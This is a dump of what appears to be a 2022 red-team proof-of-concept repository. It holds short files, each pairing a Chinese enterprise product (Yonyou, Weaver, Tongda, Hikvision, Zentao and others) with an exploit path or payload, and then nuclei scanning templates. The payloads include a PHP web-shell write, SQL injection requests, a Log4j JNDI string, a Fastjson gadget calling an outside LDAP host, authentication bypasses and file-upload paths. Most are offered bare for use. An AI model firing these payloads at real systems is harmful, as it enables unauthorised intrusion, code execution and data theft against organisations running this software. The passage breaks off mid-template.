├── 蓝凌OA未授权
    ├── shell.txt
    ├── url.txt
    ├── READEME
    │   ├── image-20220802090453235.png
    │   ├── image-20220802090521854.png
    │   ├── image-20220802091136108.png
    │   └── image-20220802091436656.png
    ├── rce.py
    └── README.md
├── 致远OA.md
├── 网康科技网关RCE.md
├── 帆软报表反序列化.md
├── 安恒明御网关注入.md
├── TRS-WAS远程命令执行.md
├── WebLogic反序列化RCE路径探测.md
├── 帆软1day.md
├── 用友u8 cloud任意文件上传漏洞.md
├── Apache Log4j2 RCE.md
├── H3C企业路由器(ER、ERG2、GR系列)任意用户登录.md
├── 用友NC系统uapws wsdl XXE漏洞.md
├── 用友时空KSOA软件前台文件上传漏洞.md
├── 用友FE协作办公平台templateOfTaohong_manager.jsp目录遍历.md
├── 泛微OA-0day管理员任意登录.md
├── 禅道注入
    ├── .idea
    │   ├── vcs.xml
    │   ├── .gitignore
    │   ├── modules.xml
    │   └── zentao.iml
    └── README.md
├── 泛微E-office do_excel.php任意文件写入漏洞.md
├── 禅道 v16.5 SQL注入.md
├── 用友GRP-U8财务管理软件任意文件上传.md
├── Fastjson代码执行漏洞 [CVE-2022-25845].md
├── 通达OA登录认证绕过.md
├── 红帆医疗云OA医用版前台SQL注入漏洞.md
├── 海康威视综合运营管理平台RCE.md
├── nuclei_pocs
    ├── squid-detect.yaml
    ├── werkzeug-debug.yaml
    ├── go-pprof.yaml
    ├── munin-monitoring.yaml
    ├── dir-listing.yaml
    ├── php-debug-bar.yaml
    ├── graphite-browser-detect.yaml
    ├── opengear-detect.yaml
    ├── apache-loadbalancer.yaml
    ├── apache-serverstatus.yaml
    ├── x-hacker.yaml
    ├── telerik-derserial.yaml
    ├── aws-ec2-sto.yaml
    ├── ffserver-detect.yaml
    ├── kube-dashboard-detect.yaml
    ├── axis2-detect.yaml
    ├── missing-csp.yaml
    ├── Django-DebugMode.yaml
    ├── symfony-detect.yaml
    ├── kubernetes-api-detect.yaml
    ├── clickhouse-db-detect.yaml
    ├── display-via-header.yaml
    ├── apache-druid-detect.yaml
    ├── docker-k8s.yaml
    ├── exposed-hg.yaml
    ├── php-ini.yaml
    ├── tor-socks-proxy.yaml
    ├── CVE-2020-15004.yaml
    ├── fps-config.yaml
    ├── kafka-misconfig.yaml
    ├── pi-hole-detect.yaml
    ├── aws-metadata.yaml
    ├── host-header-injection.yaml
    ├── SquirrelMail.yaml
    ├── admin-file-search.yaml
    ├── clickhouse-db-unauth.yaml
    ├── exposed-darcs.yaml
    ├── htpasswd-detection.yaml
    ├── php-fpm-status.yaml
    ├── hadoop-unauth.yaml
    ├── npmrc.yaml
    ├── CVE-2020-14750.yaml
    ├── connect-proxy.yaml
    ├── schneider-lights.yaml
    ├── zeroshell-kerbynet-lfd.yaml
    ├── kong-detect.yaml
    ├── rocketmq-console.yaml
    ├── simple-xss.yaml
    ├── CVE-2019-11043.yaml
    ├── apache-nifi-unauth.yaml
    ├── laravel-telescope-exposed.yaml
    ├── tox-ini.yaml
    ├── basic-auth-detection.yaml
    ├── zipkin-unauth.yaml
    ├── terraform-detect.yaml
    ├── elasticsearch-cluster-health.yaml
    ├── joomla-host-injection.yaml
    ├── wordpress-rest-api.yaml
    ├── iis-directory-listing.yaml
    ├── redis-conf.yaml
    ├── globalprotect-xss.yaml
    ├── host-header-auth-bypass.yaml
    ├── CVE-2019-7192.yaml
    ├── header-blind-ssrf.yaml
    ├── sonarqube-cred.yaml
    ├── google-floc-disabled.yaml
    ├── CVE-2020-5398.yaml
    ├── circleci-ssh-config.yaml
    ├── detect-rsyncd.yaml
    ├── vernemq-status.yaml
    ├── CVE-2020-9054.yaml
    ├── git-credentials.yaml
    ├── goliath-detect.yaml
    ├── kubeflow-dashboard-unauth.yaml
    ├── lucee-detect.yaml
    ├── CVE-2018-16341.yaml
    ├── CVE-2019-19368.yaml
    ├── CVE-2020-8163.yaml
    ├── php-user-ini.yaml
    ├── wordpress-user-enum.yaml
    ├── CVE-2005-2428.yaml
    ├── CVE-2018-18264.yaml
    ├── circleci-config.yaml
    ├── django-debug.yaml
    ├── ws-config.yaml
    ├── CVE-2018-7490.yaml
    ├── magento-config.yaml
    ├── nginx-vhost-traffic-status.yaml
    ├── content_injection.yaml
    ├── rails-secret-token.yaml
    ├── CVE-2020-10220.yaml
    ├── mrtg-detect.yaml
    ├── CVE-2020-11450.yaml
    ├── CVE-2020-27982.yaml
    ├── detect-drone.yaml
    ├── moodle-auth-xss.yaml
    ├── CVE-2019-1653.yaml
    ├── CVE-2020-7246.yaml
    ├── cors-00.yaml
    ├── gogs-install-exposure.yaml
    ├── jupyter-ipython-unauth.yaml
    ├── CVE-2019-16278.yaml
    ├── CVE-2019-18394.yaml
    ├── CVE-2020-5777.yaml
    ├── comtrend-ct5367-remote-root.yaml
    ├── dbeaver-data-sources.yaml
    ├── dockercfg.yaml
    ├── redmine-cli-detect.yaml
    ├── s3cfg.yaml
    ├── CVE-2018-3714.yaml
    ├── CVE-2020-0618.yaml
    ├── pinpoint-unauth.yaml
    ├── CVE-2017-14849.yaml
    ├── CVE-2017-9506.yaml
    ├── CVE-2019-19719.yaml
    ├── CVE-2020-14181.yaml
    ├── CVE-2020-3187.yaml
    ├── CVE-2020-7048.yaml
    ├── CVE-2021-22122.yaml
    ├── exposed-bitkeeper.yaml
    ├── kafdrop-xss.yaml
    ├── zabbix-creds.yaml
    ├── CVE-2019-8903.yaml
    ├── CVE-2020-24765.yaml
    ├── homeworks-illumination-web-keypad.yaml
    ├── CVE-2018-0296.yaml
    ├── CVE-2018-11759.yaml
    ├── CVE-2020-13937.yaml
    ├── CVE-2020-15129.yaml
    ├── CVE-2020-16270.yaml
    ├── CVE-2020-25213.yaml
    ├── CVE-2021-20837.yaml
    ├── CVE-2019-11248.yaml
    ├── CVE-2018-14728.yaml
    ├── CVE-2019-11580.yaml
    ├── CVE-2020-11530.yaml
    ├── CVE-2020-12271.yaml
    ├── CVE-2020-24312.yaml
    ├── ssh-known-hosts.yaml
    ├── CVE-2019-12314.yaml
    ├── CVE-2020-5410.yaml
    ├── eyelock-nano-lfd.yaml
    ├── go-pprof-exposed.yaml
    ├── java-melody-stat.yaml
    ├── pagespeed-global-admin.yaml
    ├── CVE-2019-17382.yaml
    ├── CVE-2019-8982.yaml
    ├── kentico-open-redirect.yaml
    ├── salesforce-login.yaml
    ├── swagger-xss.yaml
    ├── ventrilo-config.yaml
    ├── CVE-2018-20824.yaml
    ├── CVE-2018-9126.yaml
    ├── CVE-2019-8449.yaml
    ├── CVE-2020-11710.yaml
    ├── CVE-2018-3167.yaml
    ├── CVE-2020-15920.yaml
    ├── CVE-2020-8772.yaml
    ├── CVE-2019-3799.yaml
    ├── CVE-2020-2140.yaml
    ├── CVE-2020-8512.yaml
    ├── php-symfony-debug.yaml
    ├── ssh-authorized-keys.yaml
    ├── CVE-2017-6360.yaml
    ├── docker-registry.yaml
    ├── ganglia-xml-grid-monitor.yaml
    ├── CVE-2018-20062.yaml
    ├── CVE-2019-9082.yaml
    ├── CVE-2019-9978.yaml
    ├── circarlife-default-login.yaml
    ├── exposed-bzr.yaml
    ├── tectuus-scada-monitor.yaml
    ├── CVE-2018-16763.yaml
    ├── CVE-2019-0230.yaml
    ├── CVE-2019-19908.yaml
    ├── esmtprc.yaml
    ├── pmb-directory-traversal.yaml
    ├── CVE-2020-5412.yaml
    ├── lutron-iot-default-login.yaml
    ├── CVE-2019-11510.yaml
    ├── CVE-2019-16662.yaml
    ├── CVE-2020-7209.yaml
    ├── nginx-vhost-xss.yaml
    ├── sftp-config.yaml
    ├── CVE-2020-2199.yaml
    ├── CVE-2020-24223.yaml
    ├── CVE-2020-7473.yaml
    ├── CVE-2021-33904.yaml
    ├── apache-druid-unauth.yaml
    ├── ftpconfig.yaml
    ├── sap-directory-listing.yaml
    ├── CVE-2018-18326.yaml
    ├── CVE-2018-19386.yaml
    ├── CVE-2018-2894.yaml
    ├── CVE-2019-14974.yaml
    ├── selea-ip-camera.yaml
    ├── CVE-2019-14696.yaml
    ├── CVE-2020-16952.yaml
    ├── CVE-2020-5284.yaml
    ├── CVE-2020-8115.yaml
    ├── gloo-unauth.yaml
    ├── gmail-api-client-secrets.yaml
    ├── joomla-lfi-comfabrik.yaml
    ├── pyramid-debug-toolbar.yaml
    ├── redmine-db-config.yaml
    ├── CVE-2014-2323.yaml
    ├── CVE-2017-0929.yaml
    ├── CVE-2017-16806.yaml
    ├── CVE-2020-11034.yaml
    ├── jetty-information-disclosure.yaml
    ├── CVE-2018-11784.yaml
    ├── CVE-2018-1247.yaml
    ├── CVE-2018-5230.yaml
    ├── CVE-2020-8091.yaml
    ├── CVE-2020-8982.yaml
    ├── CVE-2021-26475.yaml
    ├── avtech-dvr-exposure.yaml
    ├── zwave2mqtt-health-check.yaml
    ├── CVE-2017-7391.yaml
    ├── CVE-2018-1000129.yaml
    ├── CVE-2018-18069.yaml
    ├── CVE-2019-8451.yaml
    ├── CVE-2020-14179.yaml
    ├── CVE-2020-8209.yaml
    ├── CVE-2017-6361.yaml
    ├── CVE-2018-1271.yaml
    ├── config-file.yaml
    ├── django-secret.key.yaml
    ├── netdata-unauth.yaml
    ├── robomongo.yaml
    ├── wp-ambience-xss.yaml
    ├── CVE-2012-4242.yaml
    ├── CVE-2017-7529.yaml
    ├── CVE-2018-19439.yaml
    ├── CVE-2018-6389.yaml
    ├── CVE-2019-14322.yaml
    ├── CVE-2019-16759.yaml
    ├── CVE-2020-16139.yaml
    ├── CVE-2020-24550.yaml
    ├── CVE-2020-9484.yaml
    ├── header_blind_xss.yaml
    ├── php-timeclock-xss.yaml
    ├── CVE-2009-0545.yaml
    ├── CVE-2012-2371.yaml
    ├── CVE-2018-16670.yaml
    ├── CVE-2019-6112.yaml
    ├── CVE-2012-5913.yaml
    ├── CVE-2018-12634.yaml
    ├── CVE-2019-19985.yaml
    ├── CVE-2019-20141.yaml
    ├── CVE-2020-2551.yaml
    ├── CVE-2011-5179.yaml
    ├── CVE-2019-12461.yaml
    ├── CVE-2020-17506.yaml
    ├── CVE-2021-31581.yaml
    ├── remote-sync.yaml
    ├── CVE-2011-4624.yaml
    ├── CVE-2011-4926.yaml
    ├── CVE-2018-2791.yaml
    ├── dbeaver-credentials.yaml
    ├── joomla-sqli-hdwplayer.yaml
    ├── wordpress-directory-listing.yaml
    ├── CVE-2018-16668.yaml
    ├── CVE-2020-14882-2.yaml
    ├── wp-finder-xss.yaml
    ├── CVE-2020-22840.yaml
    ├── chamilo-lms-xss.yaml
    ├── laravel-telescope.yaml
    ├── wp-knews-xss.yaml
    ├── CVE-2011-4618.yaml
    └── CVE-2014-9094.yaml
└── F5 BIG-IP RCE exploitation (CVE-2022-1388).md


/蓝凌OA未授权/shell.txt:
--------------------------------------------------------------------------------
1 | 


--------------------------------------------------------------------------------
/蓝凌OA未授权/url.txt:
--------------------------------------------------------------------------------
1 | 


--------------------------------------------------------------------------------
/致远OA.md:
--------------------------------------------------------------------------------
1 | ## 致远OA
2 | 
3 | ```
4 | /NewsTodayUIBV.phphp
5 | ```
6 | 


--------------------------------------------------------------------------------
/网康科技网关RCE.md:
--------------------------------------------------------------------------------
1 | ## 网康科技网关RCE
2 | 
3 | ```
4 | /scripts/aitrain.php
5 | ```
6 | 


--------------------------------------------------------------------------------
/帆软报表反序列化.md:
--------------------------------------------------------------------------------
1 | ## 帆软报表反序列化
2 | 
3 | ```
4 | webroot/decision/remote/design/channel
5 | ```
6 | 


--------------------------------------------------------------------------------
/安恒明御网关注入.md:
--------------------------------------------------------------------------------
1 | ## 安恒明御网关注入
2 | 
3 | ```
4 | /webui/?g=aaa_portal_auth_config_reset&type=1
5 | ```
6 | 


--------------------------------------------------------------------------------
/TRS-WAS远程命令执行.md:
--------------------------------------------------------------------------------
1 | ## TRS-WAS远程命令执行
2 | 
3 | ```
4 | /mas/sysinfo/testCommandExecutor.jsp
5 | ```
6 | 


--------------------------------------------------------------------------------
/WebLogic反序列化RCE路径探测.md:
--------------------------------------------------------------------------------
1 | ## WebLogic 反序列化远程命令执行路径探测
2 | 
3 | ```
4 | /_async/AsyncResponseService
5 | ```
6 | 


--------------------------------------------------------------------------------
/帆软1day.md:
--------------------------------------------------------------------------------
1 | 
2 | ## 帆软1day
3 | 
4 | ```
5 | /webroot/decision/view/form?op=chartlink&cmd=refresh_relate_data
6 | ```
7 | 


--------------------------------------------------------------------------------
/用友u8 cloud任意文件上传漏洞.md:
--------------------------------------------------------------------------------
1 | ## 用友u8 cloud任意文件上传漏洞/nccloud前台文件上传
2 | 
3 | ```
4 | /hrss/servlet/uploadimg2File
5 | ```
6 | 


--------------------------------------------------------------------------------
/Apache Log4j2 RCE.md:
--------------------------------------------------------------------------------
1 | ## Apache Log4j 2 远程代码执行
2 | 
3 | ```
4 | (){:;}{$:;$}{jndi:rmi${{::-:}}}//dnslog/test
5 | ```
6 | 


--------------------------------------------------------------------------------
/H3C企业路由器(ER、ERG2、GR系列)任意用户登录.md:
--------------------------------------------------------------------------------
1 | ## H3C企业路由器(ER、ERG2、GR系列)任意用户登录/命令执行
2 | 
3 | ```
4 | /userLogin.asp/actionpolicy_status/
5 | ```
6 | 


--------------------------------------------------------------------------------
/用友NC系统uapws wsdl XXE漏洞.md:
--------------------------------------------------------------------------------
1 | ## 用友NC系统uapws wsdl XXE
2 | 
3 | ```
4 | /uapws/service/nc.uap.oba.update.IUpdateService?xsd={{{xmlUrl}}}
5 | ```
6 | 


--------------------------------------------------------------------------------
/用友时空KSOA软件前台文件上传漏洞.md:
--------------------------------------------------------------------------------
1 | ## 用友时空KSOA软件前台文件上传漏洞
2 | 
3 | ```
4 | /servlet/com.sksoft.bill.ImageUpload?filepath=/&filename=gmtxj.jsp
5 | ```
6 | 


--------------------------------------------------------------------------------
/蓝凌OA未授权/READEME/image-20220802090453235.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MY0723/2022-Hvv-POC/HEAD/蓝凌OA未授权/READEME/image-20220802090453235.png


--------------------------------------------------------------------------------
/蓝凌OA未授权/READEME/image-20220802090521854.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MY0723/2022-Hvv-POC/HEAD/蓝凌OA未授权/READEME/image-20220802090521854.png


--------------------------------------------------------------------------------
/蓝凌OA未授权/READEME/image-20220802091136108.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MY0723/2022-Hvv-POC/HEAD/蓝凌OA未授权/READEME/image-20220802091136108.png


--------------------------------------------------------------------------------
/蓝凌OA未授权/READEME/image-20220802091436656.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MY0723/2022-Hvv-POC/HEAD/蓝凌OA未授权/READEME/image-20220802091436656.png


--------------------------------------------------------------------------------
/用友FE协作办公平台templateOfTaohong_manager.jsp目录遍历.md:
--------------------------------------------------------------------------------
1 | ## 用友FE协作办公平台 templateOfTaohong_manager.jsp目录遍历
2 | 
3 | ```
4 | /system/mediafile/templateofTaoHong_manager.jsp?path={{{path}}}
5 | ```
6 | 


--------------------------------------------------------------------------------
/泛微OA-0day管理员任意登录.md:
--------------------------------------------------------------------------------
 1 | ## 泛微OA-0day管理员任意登录
 2 | 
 3 | 
 4 | > URL
 5 | ```
 6 | /mobile/plugin/VerifyQuickLogin.jsp
 7 | ```
 8 | 
 9 | > Payload
10 | ```
11 | identifier=1&language=1&ipaddress=
12 | ```
13 | 


--------------------------------------------------------------------------------
/禅道注入/.idea/vcs.xml:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="UTF-8"?>
2 | <project version="4">
3 |   <component name="VcsDirectoryMappings">
4 |     <mapping directory="$PROJECT_DIR$" vcs="Git" />
5 |   </component>
6 | </project>


--------------------------------------------------------------------------------
/禅道注入/.idea/.gitignore:
--------------------------------------------------------------------------------
1 | # Default ignored files
2 | /shelf/
3 | /workspace.xml
4 | # Editor-based HTTP Client requests
5 | /httpRequests/
6 | # Datasource local storage ignored files
7 | /dataSources/
8 | /dataSources.local.xml
9 | 


--------------------------------------------------------------------------------
/泛微E-office do_excel.php任意文件写入漏洞.md:
--------------------------------------------------------------------------------
 1 | ## 泛微E-office do_excel.php任意文件写入漏洞
 2 | 
 3 | > URL
 4 | ```
 5 | /WWW/general/charge/charge_list/do_excel.php
 6 | ```
 7 | 
 8 | > Payload
 9 | ```
10 | html=<?php system($_POST[pass]);?>
11 | ```
12 | 
13 | 


--------------------------------------------------------------------------------
/禅道 v16.5 SQL注入.md:
--------------------------------------------------------------------------------
1 | ```
2 | POST /zentao/user-login.html HTTP/1.1
3 | Host: 127.0.0.1
4 | Content-Type: application/x-www-form-urlencoded
5 | 
6 | account=admin%27+and++updatexml%281%2Cconcat%280x1%2Cuser%28%29%29%2C1%29+and+%271%27%3D%271
7 | ```
8 | 


--------------------------------------------------------------------------------
/用友GRP-U8财务管理软件任意文件上传.md:
--------------------------------------------------------------------------------
1 | ## 用友GRP-U8财务管理软件任意文件上传
2 | 
3 | ```
4 | /UploadFileData?action=upload_file&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=181=1&1=1&1=1&1=1&1=1&1=1&1=1&1=181=1&1=1&1=1&1=181=1&1=1&1=1&foldername=%2e%2e%2f&filename=
5 | ```
6 | 


--------------------------------------------------------------------------------
/Fastjson代码执行漏洞 [CVE-2022-25845].md:
--------------------------------------------------------------------------------
 1 | ## Fastjson代码执行漏洞(CVE-2022-25845)
 2 | 
 3 | > Fastjson <= 1.2.80
 4 | ```
 5 | {
 6 |   "@type": "java.lang.Exception",
 7 |   "@type": "com.github.isafeblue.fastjson.SimpleException",
 8 |   "domain": "calc"
 9 | }
10 | ```
11 | 


--------------------------------------------------------------------------------
/通达OA登录认证绕过.md:
--------------------------------------------------------------------------------
 1 | ## 通达OA登录认证绕过
 2 | 
 3 | > URL
 4 | 
 5 | ```
 6 | /module/retrieve_pwd/header.inc.php?_ZQA_ID=3fb5b8eadff9c793
 7 | ```
 8 | 
 9 | > Payload
10 | ```
11 | SESSION%5BLOGIN_THEME%5D=15&_SESSION%5BLOGIN_USER_ID%5D=1&SESSION%5BLOGIN_UD%5D=1
12 | ```
13 | 
14 | 


--------------------------------------------------------------------------------
/红帆医疗云OA医用版前台SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | ## 红帆医疗云OA医用版前台SQL注入漏洞
2 | 
3 | ```
4 | /api/switch-value/list?sorts=%5B%7B%22Field%22:%22convert(int,stuff((select%20quotename(name)%20from%20sys.databases%20for%20xml%20path(%27%27),1,0,%27%27))%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c5c89905a7)
5 | ```
6 | 


--------------------------------------------------------------------------------
/禅道注入/.idea/modules.xml:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="UTF-8"?>
2 | <project version="4">
3 |   <component name="ProjectModuleManager">
4 |     <modules>
5 |       <module fileurl="file://$PROJECT_DIR$/.idea/zentao.iml" filepath="$PROJECT_DIR$/.idea/zentao.iml" />
6 |     </modules>
7 |   </component>
8 | </project>


--------------------------------------------------------------------------------
/海康威视综合运营管理平台RCE.md:
--------------------------------------------------------------------------------
 1 | ## 海康威视综合运营管理平台RCE漏洞
 2 | 
 3 | > URL
 4 | 
 5 | ```
 6 | /bic/ssoService/v1/applyCT
 7 | ```
 8 | 
 9 | > Payload
10 | 
11 | ```
12 | {"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://xxx.dnstunnel.run","autoCommit":true}}
13 | ```
14 | 


--------------------------------------------------------------------------------
/nuclei_pocs/squid-detect.yaml:
--------------------------------------------------------------------------------
 1 | id: squid-detect
 2 | 
 3 | info:
 4 |   name: Squid Proxy Page
 5 |   author: notnotnotveg
 6 |   severity: informative
 7 | 
 8 | requests:
 9 |   - method: GET
10 |     path:
11 |       - "{{BaseURL}}/"
12 |     matchers:
13 |       - type: word
14 |         words:
15 |           - "Squid Software"
16 |         part: body
17 | 


--------------------------------------------------------------------------------
/nuclei_pocs/werkzeug-debug.yaml:
--------------------------------------------------------------------------------
 1 | id: werkzeug-debug
 2 | 
 3 | info:
 4 |   name: werkzeug-debug
 5 |   author: notnotnotveg
 6 |   severity: informative
 7 | 
 8 | requests:
 9 |   - method: GET
10 |     path:
11 |       - "{{BaseURL}}/console"
12 |     matchers:
13 |       - type: word
14 |         words:
15 |           - "Werkzeug"
16 |         part: body
17 | 


--------------------------------------------------------------------------------
/nuclei_pocs/go-pprof.yaml:
--------------------------------------------------------------------------------
 1 | id: go-pprof
 2 | 
 3 | info:
 4 |   name: Go Debug PPROF
 5 |   author: notnotnotveg
 6 |   severity: informative
 7 | 
 8 | requests:
 9 |   - method: GET
10 |     path:
11 |       - "{{BaseURL}}/debug/pprof/"
12 |     matchers:
13 |       - type: word
14 |         words:
15 |           - "Types of profiles available"
16 |         part: body
17 | 


--------------------------------------------------------------------------------
/禅道注入/.idea/zentao.iml:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="UTF-8"?>
2 | <module type="WEB_MODULE" version="4">
3 |   <component name="Go" enabled="true" />
4 |   <component name="NewModuleRootManager">
5 |     <content url="file://$MODULE_DIR$" />
6 |     <orderEntry type="inheritedJdk" />
7 |     <orderEntry type="sourceFolder" forTests="false" />
8 |   </component>
9 | </module>


--------------------------------------------------------------------------------
/nuclei_pocs/munin-monitoring.yaml:
--------------------------------------------------------------------------------
 1 | id: munin-monitoring
 2 | 
 3 | info:
 4 |   name: Munin Monitoring
 5 |   author: notnotnotveg
 6 |   severity: informative
 7 | 
 8 | requests:
 9 |   - method: GET
10 |     path:
11 |       - "{{BaseURL}}/munin/localhost/"
12 |     matchers:
13 |       - type: word
14 |         words:
15 |           - "<title>Munin"
16 |         part: body
17 | 


--------------------------------------------------------------------------------
/nuclei_pocs/dir-listing.yaml:
--------------------------------------------------------------------------------
 1 | id: dir-listing
 2 | 
 3 | info:
 4 |   name: Directory Listing
 5 |   author: notnotnotveg
 6 |   severity: informative
 7 | 
 8 | requests:
 9 |   - method: GET
10 |     path:
11 |       - "{{BaseURL}}/logs/"
12 |       - "{{BaseURL}}/etc/"
13 |     matchers:
14 |       - type: word
15 |         words:
16 |           - "Index of"
17 |         part: body
18 | 


--------------------------------------------------------------------------------
/nuclei_pocs/php-debug-bar.yaml:
--------------------------------------------------------------------------------
 1 | # info to search signature
 2 | id: php-debug-bar
 3 | info:
 4 |   name: PHP Debug bar
 5 |   risk: High
 6 | 
 7 | requests:
 8 |   - method: GET
 9 |     redirect: true
10 |     url: >-
11 |       {{.BaseURL}}/_debugbar/open?max=20&offset=0
12 |     detections:
13 |       - >-
14 |         StatusCode() == 200 && StringSearch("response", '{"id":"')
15 | 
16 | 


--------------------------------------------------------------------------------
/nuclei_pocs/graphite-browser-detect.yaml:
--------------------------------------------------------------------------------
 1 | id: graphite-browser-detect 
 2 | 
 3 | info:
 4 |   name: graphite-browser-detect
 5 |   author: notnotnotveg
 6 |   severity: informative
 7 | 
 8 | requests:
 9 |   - method: GET
10 |     path:
11 |       - "{{BaseURL}}/"
12 |     matchers:
13 |       - type: word
14 |         words:
15 |           - "<title>Graphite Browser"
16 |         part: body
17 | 


--------------------------------------------------------------------------------
/nuclei_pocs/opengear-detect.yaml:
--------------------------------------------------------------------------------
 1 | id: Opengear Console Detection
 2 | 
 3 | info:
 4 |   name: Opengear Console Detection
 5 |   author: notnotnotveg
 6 |   severity: informative
 7 | 
 8 | requests:
 9 |   - method: GET
10 |     path:
11 |       - "{{BaseURL}}/"
12 |     matchers:
13 |       - type: word
14 |         words:
15 |           - "Opengear Management Console"
16 |         part: body
17 | 


--------------------------------------------------------------------------------
/nuclei_pocs/apache-loadbalancer.yaml:
--------------------------------------------------------------------------------
 1 | id: apache-loadbalancer
 2 | 
 3 | info:
 4 |   name: Apache Load Balancer Manager
 5 |   author: notnotnotveg
 6 |   severity: informative
 7 | 
 8 | requests:
 9 |   - method: GET
10 |     path:
11 |       - "{{BaseURL}}/balancer-manager"
12 |     matchers:
13 |       - type: word
14 |         words:
15 |           - "Load Balancer Manager"
16 |         part: body
17 | 


--------------------------------------------------------------------------------
/nuclei_pocs/apache-serverstatus.yaml:
--------------------------------------------------------------------------------
 1 | id: apache-serverstatus
 2 | 
 3 | info:
 4 |   name: Apache Server Status Page
 5 |   author: notnotnotveg
 6 |   severity: informative
 7 | 
 8 | requests:
 9 |   - method: GET
10 |     path:
11 |       - "{{BaseURL}}/server-status"
12 |     matchers:
13 |       - type: word
14 |         words:
15 |           - "<h1>Apache Server Status for"
16 |         part: body
17 | 


--------------------------------------------------------------------------------
/nuclei_pocs/x-hacker.yaml:
--------------------------------------------------------------------------------
 1 | id: x-hacker
 2 | 
 3 | info:
 4 |   name: Displays the X-Hacker server header if defined
 5 |   author: geeknik
 6 |   severity: info
 7 | 
 8 | requests:
 9 |   - method: GET
10 |     path:
11 |       - "{{BaseURL}}"
12 | 
13 |     extractors:
14 |       - type: regex
15 |         part: header
16 |         name: x-hacker
17 |         regex:
18 |           - '(?i)X-Hacker:.*'
19 | 


--------------------------------------------------------------------------------
/nuclei_pocs/telerik-derserial.yaml:
--------------------------------------------------------------------------------
 1 | id: telerik-deserial
 2 | 
 3 | info:
 4 |   name: Telerik Deserialization
 5 |   author: notnotnotveg
 6 |   severity: informative
 7 | 
 8 | requests:
 9 |   - method: GET
10 |     path:
11 |       - "{{BaseURL}}/Telerik.Web.UI.DialogHandler.aspx"
12 |     matchers:
13 |       - type: word
14 |         words:
15 |           - "Loading the dialog"
16 |         part: body
17 | 


--------------------------------------------------------------------------------
/nuclei_pocs/aws-ec2-sto.yaml:
--------------------------------------------------------------------------------
 1 | id: aws-ec2-sto
 2 | type: dns
 3 | info:
 4 |   name: AWS EC2 Subdomain Takeover
 5 |   risk: Potential
 6 | 
 7 | dns:
 8 |   - domain: '{{.Domain}}'
 9 |     record: 'A'
10 |     detections:
11 |       - >-
12 |         DnsRegex('A', '(?m).*ec2.*compute\\.amazonaws\\.com.*A$')
13 | 
14 | references:
15 |   - link: https://enfinlay.github.io/ec2/deadend/2019/10/19/ec2-takeover-attempt.html


--------------------------------------------------------------------------------
/禅道注入/README.md:
--------------------------------------------------------------------------------
 1 | # Zentao Sqli CNVD-2022-42853
 2 | 
 3 | # 1.简介
 4 | 
 5 | Zentao v16.5 SQL注入漏洞 POC
 6 | 
 7 | # 2.用法
 8 | 
 9 | ```
10 | poc -h 192.168.1.1 // 单个扫描
11 | poc -f host.txt  // 批量扫描
12 | ```
13 | ![image](https://user-images.githubusercontent.com/108780847/181902798-49e3348e-8e3e-426a-bace-7505d5c5a9ca.png)
14 | 
15 | # 3.免责声明
16 | 
17 | 此工具仅用于学习、研究和自查。
18 | 不应用于非法目的，请遵守相关法律法规。
19 | 使用本工具产生的任何风险与本人无关！
20 | 


--------------------------------------------------------------------------------
/nuclei_pocs/ffserver-detect.yaml:
--------------------------------------------------------------------------------
 1 | id: ffserver detect
 2 | 
 3 | info:
 4 |   name: FFServer Detect
 5 |   author: notnotnotveg
 6 |   severity: informative
 7 | 
 8 | requests:
 9 |   - method: GET
10 |     path:
11 |       - "{{BaseURL}}:8090/status.html"
12 |       - "{{BaseURL}}/status.html"
13 |     matchers:
14 |       - type: word
15 |         words:
16 |           - "<title>ffserver Status"
17 |         part: body
18 | 


--------------------------------------------------------------------------------
/nuclei_pocs/kube-dashboard-detect.yaml:
--------------------------------------------------------------------------------
 1 | id: kube-dashboard
 2 | 
 3 | info:
 4 |   name: Kubernetes Dashboard Detection
 5 |   author: notnotnotveg
 6 |   severity: informative
 7 | 
 8 | requests:
 9 |   - method: GET
10 |     path:
11 |       - "{{BaseURL}}/dashboard/#!/namespace?namespace=default"
12 |     matchers:
13 |       - type: word
14 |         words:
15 |           - "kubernetesDashboard"
16 |         part: body
17 | 


--------------------------------------------------------------------------------
/nuclei_pocs/axis2-detect.yaml:
--------------------------------------------------------------------------------
 1 | id: axis2-detect
 2 | 
 3 | info:
 4 |   name: Apache Axis2
 5 |   author: notnotnotveg
 6 |   severity: informative
 7 | 
 8 | requests:
 9 |   - method: GET
10 |     path:
11 |       - "{{BaseURL}}/axis2/services/listServices"
12 |       - "{{BaseURL}}/dswsbobje/services/listServices"
13 |     matchers:
14 |       - type: word
15 |         words:
16 |           - "Service Description"
17 |         part: body
18 | 


--------------------------------------------------------------------------------
/nuclei_pocs/missing-csp.yaml:
--------------------------------------------------------------------------------
 1 | id: missing-csp
 2 | info:
 3 |   name: CSP Not Enforced
 4 |   author: geeknik
 5 |   severity: info
 6 |   description: Checks if there is a CSP header
 7 |   tags: misc
 8 | 
 9 | requests:
10 |   - method: GET
11 |     path:
12 |       - '{{BaseURL}}'
13 |     redirects: true
14 |     matchers:
15 |       - type: dsl
16 |         dsl:
17 |           - '!contains(tolower(all_headers), ''content-security-policy'')'
18 | 


--------------------------------------------------------------------------------
/nuclei_pocs/Django-DebugMode.yaml:
--------------------------------------------------------------------------------
 1 | id : Django-DebugMode
 2 | 
 3 | info:
 4 |   name: Django Debug Mode True
 5 |   author: GodfatherOrwa&JafarAlQudah1
 6 |   severity: high
 7 | 
 8 | requests:
 9 |   - method: GET
10 |     path:
11 |       - "{{BaseURL}}/anything123456"
12 |     matchers:
13 |       - type: word
14 |         words:
15 |           - "DEBUG = True"
16 |           - "DEBUG=True."
17 |         part: body    
18 |         condition: or  
19 | 


--------------------------------------------------------------------------------
/nuclei_pocs/symfony-detect.yaml:
--------------------------------------------------------------------------------
 1 | id: symfony-detect
 2 | info:
 3 |   name: Detect Symfony Software
 4 |   author: grant
 5 |   severity: info
 6 | requests:
